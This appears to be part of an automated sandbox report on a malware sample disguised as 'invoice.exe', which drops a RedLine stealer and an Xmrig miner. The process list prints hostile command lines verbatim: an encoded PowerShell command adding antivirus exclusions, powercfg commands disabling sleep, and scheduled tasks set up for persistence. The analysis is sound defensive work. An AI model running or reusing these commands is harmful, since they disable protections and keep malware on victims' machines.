                                Data Ascii: pletion_new_domain","copilot_conversational_ux_history_refs","copilot_copy_message","copilot_followup_to_agent","copilot_implicit_context","copilot_smell_icebreaker_ux","experimentation_azure_variant_endpoint","failbot_handle_non_errors","geojson_azure_ma
                                2024-09-04 23:45:44 UTC1370INData Raw: 62 30 33 30 64 33 61 63 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6e 76 69 72 6f 6e 6d 65 6e 74 2d 39 32 34 65 36 30 62 63 61 37 64 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69
                                Data Ascii: b030d3acc.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-924e60bca7d2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascri
                                2024-09-04 23:45:44 UTC1370INData Raw: 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 74 65 78 74 2d 65 78 70 61 6e 64 65 72 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 63 64 34 38 32 32 30 64 37 34 64 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73
                                Data Ascii: on/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-cd48220d74d5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubass
                                2024-09-04 23:45:44 UTC1370INData Raw: 38 35 36 32 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 67 69 74 68 75 62 2d 65 6c 65 6d 65 6e 74 73 2d 35 30 38 61 34 35 63 61 32 33 63 36 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69
                                Data Ascii: 85620.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-508a45ca23c6.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascri
                                2024-09-04 23:45:44 UTC1370INData Raw: 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 74 75 72 62 6f 5f 64 69 73 74 5f 74 75 72 62 6f 5f 65 73 32 30 31 37 2d 65 73 6d 5f 6a 73 2d 38 35 38 65 30 34 33 66 63 66 37 36 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65
                                Data Ascii: ithub.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-858e043fcf76.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_module
                                2024-09-04 23:45:44 UTC1370INData Raw: 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 71 75 6f 74 65 2d 73 65 6c 65 63 74 69 6f 6e 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 74 65 78 74 61 72 65 61 2d 61 75 74 6f 73 69 2d 39 65 30 33 34 39 2d 35 30 30 33 61 61 65 62 61 33 35 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d
                                Data Ascii: t" src="https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_textarea-autosi-9e0349-5003aaeba352.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src=


                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:19:45:30
                                Start date:04/09/2024
                                Path:C:\Users\user\Desktop\invoice.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\invoice.exe"
                                Imagebase:0x200000
                                File size:1'262'619 bytes
                                MD5 hash:6AF6A7FAC1197A9B12B28C0E4DB8C18A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:1
                                Start time:19:45:31
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.bat" "
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:2
                                Start time:19:45:31
                                Start date:04/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:3
                                Start time:19:45:31
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /c dir /b "*.exe"
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:19:45:31
                                Start date:04/09/2024
                                Path:C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exe
                                Wow64 process (32bit):true
                                Commandline:"4usfliof.exe"
                                Imagebase:0x990000
                                File size:3'555'328 bytes
                                MD5 hash:B154114F2D13496DC9630CAC4E707672
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000003.1664492512.0000000001272000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.1834530899.00000000009BD000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 83%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:5
                                Start time:19:45:31
                                Start date:04/09/2024
                                Path:C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exe
                                Wow64 process (32bit):true
                                Commandline:"yee9mbi69cm7.exe"
                                Imagebase:0x760000
                                File size:6'004'224 bytes
                                MD5 hash:D076D83093CF70D43AE8202CB9603D0D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 88%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:6
                                Start time:19:45:31
                                Start date:04/09/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                Imagebase:0x1d0000
                                File size:45'984 bytes
                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.2888940061.00000000005A2000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:9
                                Start time:19:45:32
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 288
                                Imagebase:0x3c0000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:10
                                Start time:19:45:34
                                Start date:04/09/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                Imagebase:0x300000
                                File size:45'984 bytes
                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:11
                                Start time:19:45:34
                                Start date:04/09/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                Imagebase:0xfe0000
                                File size:45'984 bytes
                                MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_MinerDownloader_3, Description: Yara detected Generic MinerDownloader, Source: 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:12
                                Start time:19:45:34
                                Start date:04/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:14
                                Start time:19:45:35
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 224
                                Imagebase:0x3c0000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:15
                                Start time:19:45:37
                                Start date:04/09/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                Imagebase:0x3b0000
                                File size:103'528 bytes
                                MD5 hash:89D41E1CF478A3D3C2C701A27A5692B2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_MinerDownloader_3, Description: Yara detected Generic MinerDownloader, Source: 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_MinerDownloader_3, Description: Yara detected Generic MinerDownloader, Source: 0000000F.00000002.1789091903.0000000006971000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.1789091903.0000000006971000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Has exited:true

                                General

                                Target ID:16
                                Start time:19:45:39
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"cmd.exe" /C powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:17
                                Start time:19:45:39
                                Start date:04/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:18
                                Start time:19:45:39
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A"
                                Imagebase:0x580000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:20
                                Start time:19:45:41
                                Start date:04/09/2024
                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Imagebase:0x7ff693ab0000
                                File size:496'640 bytes
                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:21
                                Start time:19:45:42
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:22
                                Start time:19:45:42
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:23
                                Start time:19:45:42
                                Start date:04/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:24
                                Start time:19:45:42
                                Start date:04/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:25
                                Start time:19:45:42
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                Imagebase:0xfc0000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                General

                                Target ID:26
                                Start time:19:45:42
                                Start date:04/09/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                                Imagebase:0xfc0000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Disassembly

                                No disassembly